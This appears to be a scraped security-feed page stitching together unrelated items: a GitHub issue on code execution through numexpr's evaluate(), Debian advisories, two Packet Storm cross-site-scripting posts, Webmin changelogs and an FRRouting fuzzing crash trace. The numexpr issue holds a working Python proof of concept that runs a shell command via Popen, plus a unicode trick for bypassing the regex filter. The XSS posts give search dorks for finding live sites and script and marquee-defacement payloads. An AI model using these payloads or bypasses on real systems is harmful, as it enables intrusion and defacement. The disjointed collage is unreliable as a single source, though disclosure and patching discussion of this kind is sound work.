An issue in LanChain-ai Langchain v.0.0.245 allows a remote attacker to execute arbitrary code via the evaluate function in the numexpr library.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

corgeman opened this issue

Jul 7, 2023

· 35 comments

**Comments**

The evaluate() function eventually calls eval() on the data provided. eval() is extremely dangerous when supplied with user input and to my knowledge it isn't mentioned that the function does this. I would add a warning in the documentation about this. As a proof-of-concept, the following code should execute the command 'echo verybad' on your computer when ran:

import numexpr
s \= """
(lambda fc=(
    lambda n: \[
        c for c in 
            ().\_\_class\_\_.\_\_bases\_\_\[0\].\_\_subclasses\_\_() 
            if c.\_\_name\_\_ == n
        \]\[0\]
    ):
    fc("function")(
        fc("Popen")("echo verybad",shell=True),{}
    )()
)()
"""
numexpr.evaluate(s)

Yeah developers seem to be using NumExpr more and more as a parser for handling input from a UI. It would be much safer if we could use ast.parse instead. I think adding a warning to the docs is fine, but it would also make sense to me to add an optional sanitizer. We could search the string for various Python keywords that have no business being in an expression, such as:

1.  import
2.  lambda
3.  eval
4.  __ (dunder)
5.  locals
6.  globals

Sanitization could be enabled by default but give the user the means to turn it off.

Alright I implemented a check in 4b2d89c that forbids certain operators used in the expression. Namely: ;, :, [, and __. As far as I can tell this defeats all of the commonly cited attack vectors against eval(). I.e. it bans multiple expressions, lambdas, indexing, and all the dunders. If we want to be very safe, we would want to ban . as a character. However, this is difficult because . is both the reference operator and the decimal operator.

If we want to ban . we could do so if we require it to be followed by a numeral. E.g. 0.1 would pass the check, os.remove would not pass the check. However, this would ban valid Python code such as a * 5. which is a shorthand for casting to double. Perhaps there is someone out their with better regex-foo than myself and can suggest a solution for a regex that bans the Python . operator but doesn't cause issues for decimal points?

Regardless I think this is a good step forward and we're at the point where we should do a new release.

Ok, made some more improvements. I can ban attribute access to everything but .real and .imag, via

_forbidden_re = re.compile('[\;[\:]|__|\.[abcdefghjklmnopqstuvwxyzA-Z_]')

I also strip the string of all whitespace beforehand.

Closing with release of 2.8.5.

Hi @robbmcleod, just wanted to point out that you can still access other attributes because Python translates some utf chars into ascii chars automatically (mainly greek alphabet used in math), thus:

    numexpr.evaluate("(3+1).ᵇit_count()")
    

Results in:

It might be better to whitelist real and imag rather than blacklist chars.

@jan-kubena ok thanks for the heads up. The trouble here is that decimal needs to work, and numbers can appear in variable names, but not at the start. Do you happen to know where the documentation for which character sets are mangled is?

The really proper way to do it would be to back-port the ast parser work I did in for my attempt at making 3.0.

Apparently the pandas group is using dunders as private variables in some of their NumExpr calls.

pandas-dev/pandas#54449

I'm of two minds about this. I could regex against "**\[a-zA-Z0-9\_\]+**" instead of just "\_\_". But for the security conscious, it does feel to me that NumExpr shouldn't be able to access private variables in the locals and globals dictionaries.

Hi folks,

I have a simpler example which also breaks in the new version:

import pandas as pd

name \= "Mass (kg)"
df \= pd.DataFrame({name: \[200, 300, 400\]})
df.query(f"\`{name}\` < 300")

    ValueError: Expression (BACKTICK_QUOTED_STRING_Mass__LPAR_kg_RPAR_) < (300) has forbidden control characters.
    

I understand Mass (kg) is a reasonable column name, so the validation definitely needs more tuning.

Hi folks,  
I'm not sure if it is the same issue here, we are using numexpr for calculations in a pandas dataframe and we are using double underscore in some of our calculations (for instance, a__b) but now it fails in 2.8.5 (working in 2.8.4).  
I have a minimal example without involving pandas:

import numexpr
numexpr.evaluate('a\_\_b / 2', {'a\_\_b': 4})

Or a oneliner:

python -c "import numexpr; print(numexpr.evaluate('a__b / 2', {'a__b': 4}))"

In numexpr==2.8.4 that one works perfectly.  
In numexpr==2.8.5 we have the following:  
ValueError: Expression a__b / 2 has forbidden control characters.

Is it an intentional feature or something that can be workedaround easily (sending some kwarg to ignore the error)?  
We will pin our numexpr requeriments to "<2.8.5" in the meanwhile.

Many thanks!

@nicoddemus and @zorion, just waiting to hear back from Pandas' devs on the original report: pandas-dev/pandas#54449 before I do anything. I've tried in the past to establish some sort of line of communication with them and gotten crickets.

Hi, thanks for your reply.

I think we are having a legit use of dunder but it is not allowed in a breaking change from 2.8.4 to 2.8.5 so we have to fix our version to 2.8.4 (or lower) and this is an ok workaround for now.  
On the other hand, if we had a way to flag "evaluate" that we trust our input we may remove this version restriction. Is it possible to do so?

Many thanks in advance!

> @nicoddemus and @zorion, just waiting to hear back from Pandas' devs on the original report: pandas-dev/pandas#54449 before I do anything. I've tried in the past to establish some sort of line of communication with them and gotten crickets.

Hi, one of the pandas devs here.

I don't maintain the eval code (I don't think anyone still here does anymore), so not really the best person to comment on this.

Is there a way to gate this stricter checking behind an option?  
(For pandas, we have a warning in the docs saying that eval will let users run arbritary code)

Thanks,  
Thomas

@lithomas1 and company,

I see a few approaches here.

1.  We can deprecate the implementation of the __ filter for a immediate release and put it back in for a future release.
2.  We can put in an option to disable the security check. However, I do think it should default to be on.

In order to avoid forcing everyone to do an emergency release, we probably need to do both, assuming the option defaults to sanitize.

> @lithomas1 and company,
> 
> I see a few approaches here.
> 
> 1.  We can deprecate the implementation of the __ filter for a immediate release and put it back in for a future release.
> 2.  We can put in an option to disable the security check. However, I do think it should default to be on.
> 
> In order to avoid forcing everyone to do an emergency release, we probably need to do both, assuming the option defaults to sanitize.

Thanks, this sounds good to me.  
2 is probably good enough for pandas.  
(We are going to be releasing soon anyways in a couple weeks. I think users can be fine pinning numexpr for now).

It would be nice to actually fix pandas, however, I'm not too sure what the future of eval/query will be given its current "zombie"-like state.

There's actually _two_ changes in numexpr 2.8.5 that fail pandas tests - this, and a change to integer overflow behaviour (possibly a result of the negative-powers changes, but I'm not sure yet) pandas-dev/pandas#54546

@rebecca-palmer You can make a new issue if you want, but NumExpr could never cover 2**100 as that's way in excess of 64-bit integers.

@zorion, @nicoddemus, @lithomas1 I made a push in 397cc98 that should hopefully fix these issues, if you could please test?

1.  I improved the blacklisting. It should better match the funny unicode coercion that can be done for the attribute access attack.
2.  It only blocks dunders and not a single double underscore.
3.  You can disable it by calling validate(..., sanitize=False) or equivalently evaluate(..., sanitize=False).

If you have a chance please test and provide me with any feedback you may have.

Hi @robbmcleod,

Thanks for attempting a fix.

My original example now passes, but this one breaks (reduced from the actual code):

import pandas as pd

name \= "II (MM)"
df \= pd.DataFrame({name: \[200, 300, 400\]})
df.query(f"\`{name}\` >= 3.1e-05")

    ValueError: Expression (BACKTICK_QUOTED_STRING_II__LPAR_MM_RPAR_) >= (3.1e-05) has forbidden control characters.
    

The problem in this case seems to be the scientific notation, if I change 3.1e-05 to something that does not format to scientific (say 0.31) then it no longer errors out. If I use the actual number in decimal notation (0.000031) it still fails because it seems internally it formats back to scientific, because it generates the exact same message as above (with 3.1e-05):

import pandas as pd

name \= "II (MM)"
df \= pd.DataFrame({name: \[200, 300, 400\]})
df.query(f"\`{name}\` >= 0.000031")

    ValueError: Expression (BACKTICK_QUOTED_STRING_II__LPAR_MM_RPAR_) >= (3.1e-05) has forbidden control characters.
    

sanitize=False would be great for us, however we call DataFrame.query which does not have that argument yet.

@nicoddemus @robbmcleod I think changing \_attr\_pat to r'.\\b(?!(real|imag|\\d+e?)\\b)' (i.e. adding 'e?') fixes that, but I haven't actually tested it.

Perhaps a more reliable approach would be to use ast.parse, and reject the tree if we find statements, lambdas, dunder import, etc?

@robbmcleod I've added some comments in the commit - do those notify anyone when it's already on the main branch?

It needs to match [eE]?[+-]?. I.e. either 'e' or 'E' can denote scientific notation and then it can be '-' or '+' exponents. It's not a big deal, I just haven't had time to sit down and do it yet. Please be patient.

I definitely don't get notifications on commits.

@nicoddemus I did use ast.parse for the NumExpr-3.0 branch. This is not a trivial fix to backport it. NumExpr 2 has an home-brew AST.

I think that most of the comments are in 397cc98

@robbmcleod Sorry if that looked like a demand to hurry - it was not intended as such, but as a guess that comments that don't notify anyone might _never_ get seen.

Debian now has my version, but it hasn't been through their CI yet.

I'm not sure if I should create a whole new issue for this, but the changes in this commit (which made it into 2.8.5) raise DeprecationWarning: invalid escape sequence '\;' due to the usage \; here, which turns into errors in some CI setups. I left a review comment in 397cc98 to that effect, as well. I can surface this as a bug report of its own if you like.

9b380ae switched to _attr_pat = r'\.\b(?!(real|imag|[eE]?[+-]?\d+)\b)', which probably won't do what you want - I suggest _attr_pat = r'\.\b(?!(real|imag|\d+([eE][+-]?\d+)?)\b)' but I haven't tested that

(The tests don't notice because they use test values without a . (2e-5 not 2.1e-5), which never triggered this issue to begin with. We should maybe change that.)

@rebecca-palmer I don't understand, the point is to disable attribute access. Variable/member names in Python cannot start with a number. So 2.1e-5 should never match the regex because a variable cannot start with 1, for example.

@robbmcleod (?!...) means "does **not** match this", so the items inside the (?!...) (.real, .imag, and numbers with a decimal point) are allowed while other uses of . (other attribute access) are blocked.

kozalosev added a commit to kozalosev/textUtilsBot that referenced this issue

Aug 25, 2023

If no one can think of adding any more tests to this I'll prepare another release?

I'll try and test locally against Pandas as well.

This is out of topic for this issue, but related: is there a link to a discussion to the decision to introduce this check? I ask because using a regex for this seems fragile (as this issue proves), plus the rationale itself seems a bit misguided: if it uses eval behind the covers, I think it would be best to warn users of that fact instead of trying to check that nothing fancy is going on -- because no matter how much the check is well done, it might contain flaws, which will eventually will be passed on to eval, which is a security concern. Perhaps it would make more sense to just let users know that the string is passed on to eval, and the same security concerns apply here.

Ah sorry @rebecca-palmer, seem to have missed it.

I see the suggestion of adding a warning to the docs was given, and then decided to implemented a sanitizer. OK, thanks.

CVE-2023-39631: Warn that evaluate() should not be used on user input · Issue #442 · pydata/numexpr

Debian Linux Security Advisory 5486-1 - An invalid memory access was discovered in json-c, a JSON library which could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5486-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 30, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : json-cCVE ID         : CVE-2021-32292An invalid memory access was discovered in json-c, a JSON librarywhich could result in denial of service.For the oldstable distribution (bullseye), this problem has been fixedin version 0.15-2+deb11u1.We recommend that you upgrade your json-c packages.For the detailed security status of json-c please refer toits security tracker page at:https://security-tracker.debian.org/tracker/json-cFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTvg0kACgkQEMKTtsN8TjbBag//SgTS3cthPTxMvtMctQnwOtbmjPNqjhWb8WVaesTs+y67+z38V1OWc6kdd5Lzxv0O9iHHOq78X8I7OEXDwltfcxNqlxMqNN2vYsTGeC4/ciVibn2PHYQbfistEM/cRifQsKDFZ8xb1R6t67kpSjy2ufiyODFkI/+q88qCzC2NrrtpL7/bGDEU+k6U61Ff7CYIntg8dW9FGGiZE7aeBQX6qF8o+6smsmRM+352xuv58lJdduy3IcxfSEFFWzMY6GrkbZEl1VqbjVWjjKGkfDaMHXzgsPmiAfqce36WXhcZeAVLMbVLgs2+ebcZJ/SP+tRkLqX7LNMpf/JjfAeYQTlR8855wEkpVGUa/l/idkEp3UxVKJzrdwLxZFiC38eE5ySywDKUeNWIF55ieA0+fDnepLmIbLc8OD2n9FVy4trMFLiyDvaRMGw5kdP5XdTJi44J8YtMO0BwFdryOX5Pqpl2WBGcXEcI4QxmdmoBAGz5pWp+kURCmou6t/h0JO6Lmc40T5jCnPT72OQM8Od7HjPgabm8L4I3McQjGNT4F1uwTe8MiTRoJQgdXrJQz4cuQ+Ifo29jZVJTdGrDBZi/OLfc73NZXrBakWj/ZHc4Ifu0cRQAxTxFhMWnmJZhXV9lFoC5Qf8XsBy99xIMJ6yjhT9SjIY6a+8xXgfw6Dlk0kt6pIg==J1IA-----END PGP SIGNATURE-----

Debian Security Advisory 5486-1

Debian Linux Security Advisory 5485-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5485-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 30, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2023-4573 CVE-2023-4574 CVE-2023-4575 CVE-2023-4581   
                 CVE-2023-4584

Multiple security issues have been found in the Mozilla Firefox  
web browser, which could potentially result in the execution  
of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 102.15.0esr-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 102.15.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTvgbMACgkQEMKTtsN8  
TjYyYQ/5AXRB+aU6RXtKeVkBOmIZpPzJPaSpdRNJ1YUK+V4yn9Pfsyowi+KWcGGw  
pp84zjhSlkc3ewNWvcMhyKyEB7wWRhnDE/VyxmdpxsS4CydkZc8RecLxU8B9Kddy  
qkvuXoYlFjE9fitqgU2eT0plrkJTImH6dbr6klmDqK+yQu3wl/penpMxxJEJgOWo  
oKiLe5asJJrtjVcUMrHs9CO2YspXcvlj4IBIqEfwz8FrVX0R+uMZrFARPbC6nHkv  
HJ/CUXSv3dIGEjl6opFjGDNKkBpO2ZwB9K3HBxmD320jLUgkRwKCCvyr1g+ZfcBt  
WwEwy/dE3fNJkLU5VlDdzY8O5CG4+OeP4QdICaSVqoVE1PfRX+trriAsWjENLm6o  
aWu1FLqMLvPiyRGz1d3QNeSMOvYG3czycGH5nEMWztBDFDJ+xWBZ57xUcT5xTIZb  
zWz+1ZL1rYaIrNPGC1nFcX5uHnnf7rzNjl0H18+FEudUwhzKUDdLxoMWqXJVtju2  
+YlY2OqKRQH8hrhVVuxv+L3oYF+jjQB/4hL1BrjB13K1Bqffeq5zSyKes7UfZ1AZ  
cSUVUsr3RKpCO7J+5lPOZqrThSBG3DWmmCBdl1AkZW4mv/g19EssM6zANYmZHzn8  
MyyqcIGdT0srUNECfrXzSFQ7ZhpTKAvCYt2wzrQhOsb7hxP4sa8=  
=s7Qw  
-----END PGP SIGNATURE-----

Debian Security Advisory 5485-1

IQ-Medya CMS version 2.0 suffers from a cross site scripting vulnerability.

**IQ-Medya CMS 2.0 Cross Site Scripting**

Posted Aug 30, 2023

Authored by indoushka

IQ-Medya CMS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ab1e62fc2de79708c62ff8ba7205592a862ce474915df4ff25b9a691573bdc26

Download | Favorite | View

**IQ-Medya CMS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : İQ-Medya CMS v2.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://iq-medya.net.tr                                                                                            |  | # Dork      : intext:''Tasarım iQ Digital''                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /tr/blog.php?page=<script>alert(/indoushka/);</script>[+]  http://127.0.0.1/uzmangayrimenkulcomtr/tr/blog.php?page=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,058)
*   Arbitrary (16,220)
*   BBS (2,859)
*   Bypass (1,741)
*   CGI (1,026)
*   Code Execution (7,285)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,462)
*   Encryption (2,370)
*   Exploit (52,004)
*   File Inclusion (4,225)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,788)
*   Intrusion Detection (892)
*   Java (3,046)
*   JavaScript (859)
*   Kernel (6,696)
*   Local (14,466)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,340)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,817)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,891)
*   Shell (3,188)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,394)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,798)
*   Web (9,671)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,974)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,555)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,781)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,852)
*   UNIX (9,302)
*   UnixWare (186)
*   Windows (6,579)
*   Other

IQ-Medya CMS 2.0 Cross Site Scripting

A Stored Cross-Site Scripting (XSS) vulnerability in the SSH configuration tab in Usermin 2.001 allows remote attackers to inject arbitrary web script or HTML via options for the host value while editing the host options.

Add support for Amazon Linux 2023 Fix a bug in Network Configuration module when parsing network size Fix Netplan related bugs in Network Configuration module Fix a bug with initial focus in Terminal module Fix to correctly compare Webmin semantic versions Fix to suppress output from monitor.pl command Fix bugs when reading and replying to HTML email in Usermin Assets File Size File Size Webmin Usermin webmin-2.102-1.noarch.rpm 40.8 MB usermin-2....

Add support for reading gzipped email messages Add error\_stderr API Fix to show correct locale for sudo-capable users webmin/authentic-theme#1663 Fix new signing key import on Debian and derivatives Fix to check if password hash format is valid for yescrypt and SHA512 Fix print email functionality for Read User Mail module (for both Webmin and Usermin) Fix various XSS related issues Assets File Size File Size Webmin Usermin webmin-2.101-1.noarch.rpm 40.8 MB usermin-2....

Add full support for NetworkManager in Network Configuration module Add the Terminal module to Usermin Add support for WebGL in the Terminal module Add screen reader support in Terminal module Add significant improvements to read, reply and compose mail functionality Add support for loading images via the server when reading mail Add support for showing defaults for options in PHP Configuration module Add new pagination mode in Users and Groups module Fix correctly displaying bridges with Netplan in Network Configuration module Fix displaying active network interfaces in Network Configuration module Fix to consider current drive temperature in smartctl output #1881 Fix to properly stop Usermin usermin/issues/89 Fix no to add hashed password to the old password list twice Fix displaying placeholder on input to reflect strftime-style format Update Authentic theme to the latest version adding new vertical column layout Assets File Size File Size Webmin Usermin webmin-2....

Add ability to set locale in Webmin Users module for consistency Fix to preserve initial install directory when upgrading manually Fix to preserve minimal install type when upgrading manually Fix an error when make\_date is called on undefined value #1860 Fix clearing packages caches before checking for updates in status collection #1863 Update the Authentic theme to the latest version Assets File Size webmin-2.021-1.noarch.rpm 39.6 MB webmin\_2.021\_all.deb 32.5 MB webmin-2....

Add full locale support Add slave zone file format option in BIND DNS module Add support for editing ACLs in File Manager Add support to configure SSL connection for MySQL/MariaDB module Add support for compressed backups in PostgreSQL module Add support for displaying inodes too in Disk Usage in the Dashboard Add better support for CloudLinux Fix to always default to RSA key type in Let’s Encrypt requests Fix setup repository script for Oracle Fix shutdown timeout to avoid termination of running processes Fix support for SpamAssassin 4 Fix to use system default hashing format for htpasswd file Fix FastRPC issues Update the Authentic theme to the latest version, with sped-up Dashboard performance Assets File Size webmin-2....

Fix Authentic theme issue with error handling Fix Framed theme to respect selected mode in left menu Assets File Size webmin-2.013-1.noarch.rpm 39.9 MB webmin\_2.013\_all.deb 32.7 MB webmin-2.013.tar.gz 44.9 MB webmin-2.013.pkg.gz 44.3 MB

Fix to set the correct algorithm when setting up RNDC #1817 Fix the loop bug when sourcing other network configs in Debian Fix to include all Debian network config files in backups Fix to stop doing expensive package re-fetch on upgrades Add support for defining hostname for WebSocket connection Add Debian 12 support Assets File Size webmin-2.012-1.noarch.rpm 39.9 MB webmin\_2.012\_all.deb 32.7 MB webmin-2.012.tar.gz 44.9 MB webmin-2.012.pkg.gz 44.3 MB

Add ability to set shell character encoding and set TERM environmental variable in the new Terminal module Add support for editing network interfaces in include files for Debian systems Add various improvements to the old good Framed Theme Fix to change Gray Framed Theme name to Framed Theme Fix to verify and close WebSocket session, if parent session was closed Fix to remove RC4 from the list of strong ciphers Fix don’t fail LDAP user or group deletion, if they have already been deleted Fix error handling in MySQL/MariaDB Database server module when executing SQL commands Fix adding an extra server attachment field and other bugs in Read User Mail module Fix the link to release notes for Rocky Linux Fix issues with freezing and thawing dynamic reverse zones in BIND DNS Server module Fix bugs for modules granting anonymous access Fix mailbox\_idle\_check\_interval option related bugs in Dovecot module sourceforge....

Add a new Terminal module (interactive shell) Add a new setup-repos.sh script to setup Webmin repos Add to replace old Gray Theme with Virtualmin Framed Theme Add systemd improvements Add proper support for openSUSE Leap and Tumbleweed Add Linux Lite support Fix connecting to external IPv6 LDAP server Fix self-signed certificate generation Fix setting hostname using hostnamectl command on systemd systems Fix to exclude sensors with unknown temperatures Fix for FreeBSD to support Let’s Encrypt certificates requests Fix to support attachment filenames with slash in them Assets File Size webmin-2....

Add to enforce HTTP Strict Transport Security (HSTS) policy in SSL enabled mode Add better http to https redirects when SSL is enabled Add support for installing multiple versions of Webmin on systemd systems Add support for AMD CPU thermisters #1714 Add better support for Webmin minor (release) versions upgrades Add Webmin and Usermin configuration modules display minor (release) version Add Mint Linux support Add latest Authentic 20.00 theme update with number of bug fixes Fix to also restart dependent services (i....

CVE-2023-41153: webmin-changelog

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

**ImgHosting 1.2 Cross Site Scripting**

Posted Aug 29, 2023

Authored by indoushka

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3e0de4ff80dc516a1abe50185e5807a1e503d782b2cd24457e01031368191dc0

Download | Favorite | View

**ImgHosting 1.2 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.2 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/pikhostinom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,046)
*   Arbitrary (16,219)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,283)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,460)
*   Encryption (2,370)
*   Exploit (52,001)
*   File Inclusion (4,225)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,788)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,694)
*   Local (14,460)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,339)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,816)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,891)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,394)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,796)
*   Web (9,671)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,973)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,543)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,777)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,844)
*   UNIX (9,301)
*   UnixWare (186)
*   Windows (6,579)
*   Other

ImgHosting 1.2 Cross Site Scripting

An issue was discovered in FRRouting FRR through 9.0. There is an out-of-bounds read in bgp_attr_aigp_valid in bgpd/bgp_attr.c because there is no check for the availability of two bytes during AIGP validation.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Conversation 10 Commits 1 Checks 5 Files changed

**Conversation**

Found when fuzzing:

    ==3470861==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff77801ef7 at pc 0xaaaaba7b3dbc bp 0xffffcff0e760 sp 0xffffcff0df50
    READ of size 2 at 0xffff77801ef7 thread T0
        0 0xaaaaba7b3db8 in __asan_memcpy (/home/ubuntu/frr_8_5_2/frr_8_5_2_fuzz_clang/bgpd/bgpd+0x363db8) (BuildId: cc710a2356e31c7f4e4a17595b54de82145a6e21)
        1 0xaaaaba81a8ac in ptr_get_be16 /home/ubuntu/frr_8_5_2/frr_8_5_2_fuzz_clang/./lib/stream.h:399:2
        2 0xaaaaba819f2c in bgp_attr_aigp_valid /home/ubuntu/frr_8_5_2/frr_8_5_2_fuzz_clang/bgpd/bgp_attr.c:504:3
        3 0xaaaaba808c20 in bgp_attr_aigp /home/ubuntu/frr_8_5_2/frr_8_5_2_fuzz_clang/bgpd/bgp_attr.c:3275:7
        4 0xaaaaba7ff4e0 in bgp_attr_parse /home/ubuntu/frr_8_5_2/frr_8_5_2_fuzz_clang/bgpd/bgp_attr.c:3678:10
    

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Topotests Ubuntu 18.04 arm8 part 6: Failed (click for details) Topotests Ubuntu 18.04 arm8 part 6: No useful log found Topotests Ubuntu 18.04 arm8 part 8: Failed (click for details) Topotests Ubuntu 18.04 arm8 part 8: Unknown Log URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO8U18AMD64/TopotestDetails/ Topotests Ubuntu 18.04 arm8 part 8: No useful log found Addresssanitizer topotests part 4: Incomplete (check logs for details) Topotests Ubuntu 18.04 arm8 part 9: Failed (click for details) Topotests Ubuntu 18.04 arm8 part 9: Unknown Log URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO9U18ARM8/TopotestDetails/ Topotests Ubuntu 18.04 arm8 part 9: No useful log found Topotests Ubuntu 18.04 i386 part 9: Failed (click for details)

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO9U18I386-13630/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 9**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO9U18I386/TopotestLogs/log\_topotests.txt  
Topotests Ubuntu 18.04 i386 part 9: Unknown Log  
URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO9U18I386/TopotestDetails/

Successful on other platforms/tests

*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests Ubuntu 18.04 arm8 part 1
*   Topotests Ubuntu 18.04 amd64 part 7
*   Topotests debian 10 amd64 part 6
*   Addresssanitizer topotests part 3
*   Topotests Ubuntu 18.04 i386 part 5
*   Addresssanitizer topotests part 2
*   Topotests debian 10 amd64 part 5
*   Topotests Ubuntu 18.04 arm8 part 2
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 4
*   CentOS 7 rpm pkg check
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 amd64 part 3
*   Addresssanitizer topotests part 8
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests Ubuntu 18.04 i386 part 2
*   Ubuntu 18.04 deb pkg check
*   Topotests Ubuntu 18.04 i386 part 0
*   Addresssanitizer topotests part 6
*   Topotests Ubuntu 18.04 amd64 part 1
